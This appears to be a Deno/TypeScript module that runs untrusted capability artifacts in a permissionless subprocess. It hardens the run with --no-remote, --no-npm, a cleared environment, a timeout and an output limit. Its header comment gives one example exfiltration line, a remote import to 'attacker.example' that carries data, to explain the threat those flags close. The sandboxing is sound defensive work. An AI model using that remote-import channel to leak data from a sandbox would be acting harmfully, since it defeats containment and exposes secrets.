/**
 * Sandboxed local execution (PRD-FEAT-006). Security-critical.
 *
 * The artifact runs in its own Deno subprocess with no --allow-* flag at all,
 * so `"effect": "PURE"` is enforced by the runtime rather than trusted from
 * the descriptor (Vision section 18, "Confinement Before Inference").
 *
 * Zero permissions alone is NOT sufficient, and that is worth stating plainly
 * because it is easy to get wrong:
 *
 *   - Remote module loading is not gated by --allow-net. A static
 *     `import "https://attacker.example/?data=..."` inside an artifact would be
 *     fetched by the module loader before any permission check ran, which is
 *     an exfiltration channel with zero permissions granted. --no-remote and
 *     --no-npm close it.
 *   - Deno.env is gated by --allow-env, but the host's variables would still
 *     sit in the child's OS environment. clearEnv drops them.
 *
 * The flags below are therefore part of the security boundary, not tidiness.
 */

import { join } from "@std/path";
import { toFileUrl } from "@std/path";
import { CfcmError } from "../types.ts";
import type { Effect } from "../types.ts";
import { ensureDir, paths } from "../util/paths.ts";
import { sha256Text } from "../util/hash.ts";

export interface ExecuteOptions {
  artifactPath: string;
  input: unknown;
  timeoutMs: number;
  maxOutputBytes: number;
  effect: Effect;
  capability: string;
}

export interface ExecuteResult {
  value: unknown;
  spawnMs: number;
  executionMs: number;
}

/** Flags that constitute the sandbox. Changing this list changes the threat model. */
export const SANDBOX_FLAGS = [
  "run",
  "--no-remote",
  "--no-npm",
  "--no-config",
  "--no-lock",
  "--node-modules-dir=none",
  "--quiet",
] as const;

function runnerSource(artifactPath: string): string {
  const url = toFileUrl(artifactPath).href;
  return `// Generated by CFCM. Do not edit.
// Statically imports one capability artifact so the subprocess needs no
// --allow-read: static local imports are resolved by the module loader.
import handler from ${JSON.stringify(url)};

const chunks: Uint8Array[] = [];
for await (const chunk of Deno.stdin.readable) chunks.push(chunk);
const raw = new TextDecoder().decode(
  chunks.length === 1 ? chunks[0] : new Uint8Array(await new Blob(chunks).arrayBuffer()),
);

try {
  if (typeof handler !== "function") {
    throw new TypeError("capability artifact must have a default export that is a function");
  }
  const input = raw.trim() === "" ? undefined : JSON.parse(raw);
  const value = await handler(input);
  console.log(JSON.stringify({ ok: true, value: value === undefined ? null : value }));
} catch (err) {
  const e = err as Error;
  console.log(JSON.stringify({
    ok: false,
    error: { name: e?.name ?? "Error", message: e?.message ?? String(err) },
  }));
}
`;
}

/** Runners are cached beside the artifact cache and keyed by artifact path. */
async function ensureRunner(artifactPath: string): Promise<string> {
  const dir = join(paths.home(), "runners");
  await ensureDir(dir);
  const key = (await sha256Text(artifactPath)).slice(0, 32);
  const path = join(dir, `${key}.runner.ts`);
  const source = runnerSource(artifactPath);

  try {
    if (await Deno.readTextFile(path) === source) return path;
  } catch {
    // Missing or unreadable: fall through and write it.
  }
  await Deno.writeTextFile(path, source);
  return path;
}

export async function execute(opts: ExecuteOptions): Promise<ExecuteResult> {
  if (opts.effect !== "PURE") {
    // The MVP grants no permissions to anything, so a non-PURE capability
    // could only fail confusingly at runtime. Refuse it up front instead.
    throw new CfcmError(
      "EFFECT_UNSUPPORTED",
      `${opts.capability} declares effect ${opts.effect}; the MVP executes PURE capabilities only`,
      { capability: opts.capability, effect: opts.effect },
    );
  }

  const runner = await ensureRunner(opts.artifactPath);
  const spawnStarted = performance.now();

  const command = new Deno.Command(Deno.execPath(), {
    args: [...SANDBOX_FLAGS, runner],
    stdin: "piped",
    stdout: "piped",
    stderr: "piped",
    clearEnv: true,
    // DENO_DIR is required so the child can reach its own module cache; it is
    // a path, not host state the artifact can read (Deno.env stays blocked).
    env: { DENO_DIR: Deno.env.get("DENO_DIR") ?? join(paths.home(), "deno-dir") },
  });

  const child = command.spawn();
  const spawnMs = Number((performance.now() - spawnStarted).toFixed(3));
  const execStarted = performance.now();

  let timedOut = false;
  let overflowed = false;
  const timer = setTimeout(() => {
    timedOut = true;
    try {
      child.kill("SIGKILL");
    } catch {
      // Already gone.
    }
  }, opts.timeoutMs);

  const writer = child.stdin.getWriter();
  const payload = new TextEncoder().encode(JSON.stringify(opts.input ?? null));
  try {
    await writer.write(payload);
  } catch {
    // The child can exit before reading stdin; the exit status is what matters.
  } finally {
    try {
      await writer.close();
    } catch {
      // Ditto.
    }
  }

  // Read stdout incrementally so an artifact cannot exhaust memory before the
  // size limit is noticed (PRD-FEAT-006.4).
  const collect = async (
    stream: ReadableStream<Uint8Array>,
    cap: number,
    onOverflow?: () => void,
  ): Promise<Uint8Array> => {
    const parts: Uint8Array[] = [];
    let total = 0;
    let overflow = false;

    for await (const chunk of stream) {
      if (total + chunk.length > cap) {
        overflow = true;
        onOverflow?.();
        try {
          child.kill("SIGKILL");
        } catch { /* already gone */ }
        // Keep draining so the child is not left blocked on a full pipe, but
        // stop retaining anything.
        continue;
      }
      total += chunk.length;
      parts.push(chunk);
    }

    if (overflow) return new Uint8Array(0);

    const out = new Uint8Array(total);
    let offset = 0;
    for (const p of parts) {
      out.set(p, offset);
      offset += p.length;
    }
    return out;
  };

  const [stdoutBytes, stderrBytes, status] = await Promise.all([
    collect(child.stdout, opts.maxOutputBytes, () => {
      overflowed = true;
    }),
    collect(child.stderr, 64 * 1024),
    child.status,
  ]);

  clearTimeout(timer);
  const executionMs = Number((performance.now() - execStarted).toFixed(3));

  if (overflowed) {
    throw new CfcmError(
      "OUTPUT_TOO_LARGE",
      `${opts.capability} produced more than ${opts.maxOutputBytes} bytes and was terminated`,
      { capability: opts.capability, maxOutputBytes: opts.maxOutputBytes },
    );
  }

  if (timedOut) {
    throw new CfcmError(
      "TIMEOUT",
      `${opts.capability} exceeded its ${opts.timeoutMs} ms timeout and was terminated`,
      { capability: opts.capability, timeoutMs: opts.timeoutMs },
    );
  }

  const stdout = new TextDecoder().decode(stdoutBytes).trim();
  const stderr = new TextDecoder().decode(stderrBytes).trim();

  if (!status.success && stdout === "") {
    throw new CfcmError(
      "EXECUTION_FAILED",
      `${opts.capability} exited with code ${status.code}`,
      { capability: opts.capability, code: status.code, stderr: stderr.slice(0, 2000) },
    );
  }

  let envelope: { ok: boolean; value?: unknown; error?: { name: string; message: string } };
  try {
    envelope = JSON.parse(stdout);
  } catch {
    throw new CfcmError(
      "EXECUTION_FAILED",
      `${opts.capability} did not produce a JSON result envelope`,
      { capability: opts.capability, stdout: stdout.slice(0, 2000), stderr: stderr.slice(0, 2000) },
    );
  }

  if (!envelope.ok) {
    throw new CfcmError(
      "CAPABILITY_ERROR",
      `${opts.capability} failed: ${envelope.error?.message ?? "unknown error"}`,
      { capability: opts.capability, errorName: envelope.error?.name ?? "Error" },
    );
  }

  return { value: envelope.value, spawnMs, executionMs };
}
